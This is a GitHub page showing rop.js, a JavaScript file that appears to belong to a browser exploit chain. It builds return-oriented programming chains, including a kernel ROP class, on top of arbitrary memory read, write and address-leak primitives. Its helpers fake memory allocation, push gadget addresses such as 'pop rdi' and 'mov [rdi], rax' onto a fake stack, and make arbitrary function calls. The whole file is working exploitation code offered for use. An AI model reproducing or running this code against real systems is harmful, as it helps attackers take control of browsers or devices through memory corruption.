-
Notifications
You must be signed in to change notification settings - Fork 52
/
Copy pathrop.js
138 lines (113 loc) · 3.35 KB
/
rop.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
// Basic memory functions
function malloc(size)
{
var backing = new Uint8Array(0x10000 + size);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = backing;
return ptr;
}
function mallocu32(size) {
var backing = new Uint8Array(0x10000 + size * 4);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
function stringify(str)
{
var bufView = new Uint8Array(str.length + 1);
for(var i=0; i < str.length; i++) {
bufView[i] = str.charCodeAt(i) & 0xFF;
}
window.nogc.push(bufView);
return p.read8(p.leakval(bufView).add32(0x10));
}
// Class for quickly creating a kernel ROP chain
var krop = function (p, addr) {
// Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
this.stackBase = addr;
this.stackPointer = 0;
// Push instruction / value onto fake stack
this.push = function (val) {
p.write8(this.stackBase.add32(this.stackPointer), val);
this.stackPointer += 8;
};
// Write to address with value (helper function)
this.write64 = function (addr, val) {
this.push(window.gadgets["pop rdi"]);
this.push(addr);
this.push(window.gadgets["pop rax"]);
this.push(val);
this.push(window.gadgets["mov [rdi], rax"]);
}
// Return krop object
return this;
};
// Class for quickly creating and managing a ROP chain
window.rop = function() {
this.stack = new Uint32Array(0x10000);
this.stackBase = p.read8(p.leakval(this.stack).add32(0x10));
this.count = 0;
this.clear = function() {
this.count = 0;
this.runtime = undefined;
for(var i = 0; i < 0xFF0 / 2; i++)
{
p.write8(this.stackBase.add32(i*8), 0);
}
};
this.pushSymbolic = function() {
this.count++;
return this.count-1;
}
this.finalizeSymbolic = function(idx, val) {
p.write8(this.stackBase.add32(idx * 8), val);
}
this.push = function(val) {
this.finalizeSymbolic(this.pushSymbolic(), val);
}
this.push_write8 = function(where, what)
{
this.push(gadgets["pop rdi"]); // pop rdi
this.push(where); // where
this.push(gadgets["pop rsi"]); // pop rsi
this.push(what); // what
this.push(gadgets["mov [rdi], rsi"]); // perform write
}
this.fcall = function (rip, rdi, rsi, rdx, rcx, r8, r9)
{
if (rdi != undefined) {
this.push(gadgets["pop rdi"]); // pop rdi
this.push(rdi); // what
}
if (rsi != undefined) {
this.push(gadgets["pop rsi"]); // pop rsi
this.push(rsi); // what
}
if (rdx != undefined) {
this.push(gadgets["pop rdx"]); // pop rdx
this.push(rdx); // what
}
if (rcx != undefined) {
this.push(gadgets["pop rcx"]); // pop r10
this.push(rcx); // what
}
if (r8 != undefined) {
this.push(gadgets["pop r8"]); // pop r8
this.push(r8); // what
}
if (r9 != undefined) {
this.push(gadgets["pop r9"]); // pop r9
this.push(r9); // what*/
}
this.push(rip); // jmp
return this;
}
this.run = function() {
var retv = p.loadchain(this, this.notimes);
this.clear();
return retv;
}
return this;
};